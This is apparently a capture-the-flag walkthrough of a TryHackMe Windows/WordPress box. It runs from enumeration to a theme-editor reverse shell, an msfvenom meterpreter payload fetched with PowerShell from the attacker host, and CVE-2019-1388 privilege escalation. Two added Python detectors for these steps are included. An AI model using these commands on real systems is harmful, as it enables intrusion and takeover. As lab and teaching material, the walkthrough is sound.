Disclaimer
The host penetrated in this article is legally authorized. The tools and methods used here are for learning and exchange only. Do not use the tools or the penetration ideas in this article for any illegal purpose. I bear no responsibility for any consequences, misuse or damage.
Service discovery
┌──(root💀kali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.10.216
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDT
Nmap scan report for 10.10.10.216
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds
Only two services are exposed: the web server on port 80 and Remote Desktop on port 3389.
Directory brute-forcing
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log

Target: http://10.10.10.216/

[05:03:57] Starting:
[05:04:35] 301 -  150B  - /retro  ->  http://10.10.10.216/retro/
The scan finds a single directory, /retro. Browsing it shows a WordPress site.
Enumeration now splits into two steps: keep brute-forcing directories under /retro, and enumerate WordPress information with wpscan.
WordPress directory brute-forcing
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log

Target: http://10.10.10.216/retro/

[05:08:14] Starting:
[05:08:21] 301 -  161B  - /retro/wp-content  ->  http://10.10.10.216/retro/wp-content/
[05:08:24] 301 -  162B  - /retro/wp-includes  ->  http://10.10.10.216/retro/wp-includes/
[05:09:04] 301 -  159B  - /retro/wp-admin  ->  http://10.10.10.216/retro/wp-admin/
Only the three standard WordPress folders turn up, and none of them allows directory listing, so there is nothing useful here.
WordPress information enumeration
wpscan confirms the WordPress version: 5.2.1
└─# wpscan --url http://10.10.10.216/retro
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.216/retro/ [10.10.10.216]
[+] Started: Fri Nov  5 05:09:28 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.10.216/retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <=========================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Nov  5 05:10:05 2021
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.025 KB
[+] Data Received: 221.001 KB
[+] Memory used: 210.141 MB
[+] Elapsed time: 00:00:36
On Kali, search for known vulnerabilities in this WordPress version with searchsploit.
The results include SQL injection entries:
┌──(root💀kali)-[~]
└─# searchsploit WordPress 5.2.1
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts        | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                        | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities            | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                      | php/webapps/44943.txt
WordPress Plugin Link Library 5.2.1 - SQL Injection                            | php/webapps/17887.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                    | php/webapps/48918.sh
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The injection vulnerabilities are in plugins, but none of those plugins is installed on the target, and wpscan found no plugins at all.
The home page shows the post author's name, wade. Trying to log in to WordPress with this username gives the prompt:
ERROR: The password you entered for the username wade is incorrect.
This confirms that the wade account exists.
Enumerating usernames with wpscan also confirms the users Wade and wade:
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:01:07 <=========================================> (200 / 200) 100.00% Time: 00:01:07

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
The hint for user.txt is:
Don't leave sensitive information out in the open, even if you think you have control over it.
We assume the author has talked publicly about something related to his password, perhaps hidden in a blog post.
One of the posts seems to give something away:
Ready Player One by Wade I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!
Ready Player One is the film he refers to.
At least we now know the author tends to confuse his name with the character's: the protagonist of the film is also named Wade.
In the comments under this post, the author discloses his password, parzival:
Wade December 9, 2019 Leaving myself a note here just in case I forget how to spell it: parzival
Initial shell
Since port 3389 is open, log in over Remote Desktop as wade:parzival and read user.txt from the target.
xfreerdp /u:wade /v:10.10.10.216
The same credentials also log us in to WordPress.
The usual WordPress routine once you hold an administrator account is to edit theme source code under Appearance -> Theme Editor.
I usually write the webshell into 404.php and then request a nonexistent page on the front end to trigger the reverse shell.
We write a Windows reverse shell into 404.php and get a shell:
┌──(root💀kali)-[~/tryhackme]
└─# nc -nlvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792
SOCKET: Shell has connected! PID: 3436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\retro>whoami
iis apppool\retro
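For the defending side, the theme-editor write described above leaves a trace in the web server logs. The following Python is an added example, not part of the original writeup: it parses constructed IIS W3C log lines and flags saves made through the WordPress theme editor. The log excerpt and the admin-ajax action name used by newer WordPress releases are assumptions; on the prevention side, define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the editor entirely.

```python
"""Flag WordPress theme-editor writes in IIS W3C logs (added example, constructed data)."""
from urllib.parse import parse_qs

# A save in Appearance -> Theme Editor is a POST to theme-editor.php; newer
# WordPress releases submit it via admin-ajax.php (action=edit-theme-plugin-file).
EDITOR_PATHS = ("/wp-admin/theme-editor.php", "/wp-admin/admin-ajax.php")

# Constructed IIS excerpt: a normal page view, a theme-editor save, the same
# save seen through admin-ajax naming 404.php, and the front-end request that
# would run the edited 404 template.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs-username sc-status
2021-11-05 09:12:01 10.13.21.169 GET /retro/index.php - - 200
2021-11-05 09:14:22 10.13.21.169 POST /retro/wp-admin/theme-editor.php - wade 302
2021-11-05 09:14:23 10.13.21.169 POST /retro/wp-admin/admin-ajax.php action=edit-theme-plugin-file&file=404.php&theme=90s-retro wade 200
2021-11-05 09:15:40 10.13.21.169 GET /retro/doesnotexist - - 404
"""


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def theme_editor_writes(text):
    """Return (time, user, client ip, file) for each theme-editor save.

    Only the admin-ajax form names the file in the query string; for the classic
    theme-editor.php form it is in the POST body, which IIS does not log."""
    hits = []
    for e in parse_w3c(text):
        if e["cs-method"] != "POST" or not e["cs-uri-stem"].endswith(EDITOR_PATHS):
            continue
        q = parse_qs(e["cs-uri-query"]) if e["cs-uri-query"] != "-" else {}
        if e["cs-uri-stem"].endswith("admin-ajax.php") and q.get("action") != ["edit-theme-plugin-file"]:
            continue  # other admin-ajax calls are routine WordPress traffic
        hits.append((e["time"], e["cs-username"], e["c-ip"], q.get("file", ["unknown"])[0]))
    return hits


if __name__ == "__main__":
    for hit in theme_editor_writes(SAMPLE_LOG):
        print("theme file written: time=%s user=%s ip=%s file=%s" % hit)
```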
We use msfvenom to generate a more stable shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe
Upload it to the target through the webshell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"
Also download nc and wget to the target for the rest of the engagement. Testing shows that C:\users\public\Downloads is writable.
On the remote desktop, run shell_64.exe as wade; we receive wade's reverse shell:
msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (200262 bytes) to 10.10.10.216
[*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500

meterpreter > getuid
Server username: RETROWEB\Wade
Privilege escalation
The hint for privilege escalation is:
Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.
At first I thought this meant looking for command history in cmd or PowerShell, but that turned up nothing. Later I found that the author had left a hint in the browser history pointing to CVE-2019-1388.
I found this privilege escalation script for it on GitHub.
The explanation on GitHub is brief, so I followed this article, which explains the principle of the vulnerability in detail, to escalate to SYSTEM.
In short, the principle of the escalation is this paragraph from the article:
When the OID is a hyperlink, clicking it causes consent.exe to open the browser with SYSTEM privileges to visit the link, so the browser itself runs as SYSTEM. Saving the page pops up Windows Explorer; opening cmd.exe from the right-click menu in Explorer inherits the browser's SYSTEM privileges. Thus the escalation from an ordinary user to NT AUTHORITY\SYSTEM is complete!
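From a detection standpoint, the chain in that paragraph is abnormal: consent.exe never launches a browser in normal operation, and a browser running as SYSTEM should never have cmd.exe among its descendants. The following Python is an added example, not from the original writeup or the linked article; it walks constructed process-creation events in the shape of Sysmon Event ID 1 fields (sample data and field names are assumptions) and reports that chain. The real fix is Microsoft's November 2019 patch for CVE-2019-1388.

```python
"""Spot the CVE-2019-1388 process chain in process-creation telemetry (added example)."""

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SYSTEM = "NT AUTHORITY\\SYSTEM"


def base(image):
    """File name of a Windows image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


# Constructed events in the shape of Sysmon Event ID 1 (field names assumed):
# two normal user-level processes, then consent.exe -> browser running as
# SYSTEM -> browser child process -> cmd.exe, as the quoted paragraph describes.
EVENTS = [
    {"pid": 1200, "ppid": 900, "user": "RETROWEB\\Wade", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"pid": 1300, "ppid": 900, "user": "RETROWEB\\Wade", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe"},
    {"pid": 2100, "ppid": 700, "user": SYSTEM, "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\consent.exe"},
    {"pid": 2200, "ppid": 2100, "user": SYSTEM, "parent_image": "C:\\Windows\\System32\\consent.exe",
     "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"pid": 2300, "ppid": 2200, "user": SYSTEM, "parent_image": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"pid": 2400, "ppid": 2300, "user": SYSTEM, "parent_image": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "image": "C:\\Windows\\System32\\cmd.exe"},
]


def find_escalation(events):
    """Return (browsers, chains): pids of browsers started by consent.exe as SYSTEM,
    and (browser pid, shell pid) pairs where a SYSTEM cmd/powershell descends from one."""
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    browsers, chains = [], []
    for b in events:
        if base(b["image"]) not in BROWSERS or base(b["parent_image"]) != "consent.exe" or b["user"] != SYSTEM:
            continue
        browsers.append(b["pid"])
        stack = list(children.get(b["pid"], []))  # walk the browser's whole subtree
        while stack:
            d = stack.pop()
            if base(d["image"]) in SHELLS and d["user"] == SYSTEM:
                chains.append((b["pid"], d["pid"]))
            stack.extend(children.get(d["pid"], []))
    return browsers, chains


if __name__ == "__main__":
    for bpid, spid in find_escalation(EVENTS)[1]:
        print("SYSTEM shell pid %d descends from consent.exe-launched browser pid %d" % (spid, bpid))
```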
Get root.txt from the Administrator desktop:
C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7443-948C

 Directory of C:\Users\Administrator\Desktop

12/08/2019  08:06 PM    <DIR>          .
12/08/2019  08:06 PM    <DIR>          ..
12/08/2019  08:08 PM                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,362,959,872 bytes free